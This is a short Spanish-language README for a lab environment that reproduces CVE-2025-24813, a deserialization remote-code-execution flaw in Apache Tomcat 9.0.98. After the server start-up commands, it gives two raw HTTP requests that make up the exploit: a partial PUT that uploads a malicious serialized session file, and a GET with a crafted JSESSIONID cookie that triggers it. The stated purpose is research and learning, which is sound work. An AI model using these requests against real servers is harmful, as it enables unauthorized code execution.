
tomcat CVE-2025-24813 entorno RCE de deserialización
Este repositorio es un entorno de reproducción para la última RCE de Tomcat CVE-2025-24813.
¡Solo para fines de aprendizaje e investigación!
Este entorno ya tiene habilitadas las condiciones necesarias para la reproducción anterior
Linux:
chmod +x apache-tomcat-9.0.98/bin/*
apache-tomcat-9.0.98/bin/catalina.sh run
Windows:
apache-tomcat-9.0.98/bin/catalina.bat run
Acceder a: http://127.0.0.1:9001/
Genere un archivo de serialización malicioso y súbalo con el siguiente paquete. Tenga en cuenta que el valor del fragmento de Range debe coincidir con Length y ser mayor que la longitud actual del archivo.
PUT /xxxxx/session HTTP/1.1
Host: 192.168.131.32:8080
Content-Length: 1000
Content-Range: bytes 0-1000/1200
{{contenido del archivo de deserialización}}}
Use el siguiente poc para activarlo:
GET / HTTP/1.1
Host: 192.168.131.32:8080
Cookie: JSESSIONID=.xxxxx
Referencia: https://forum.butian.net/article/674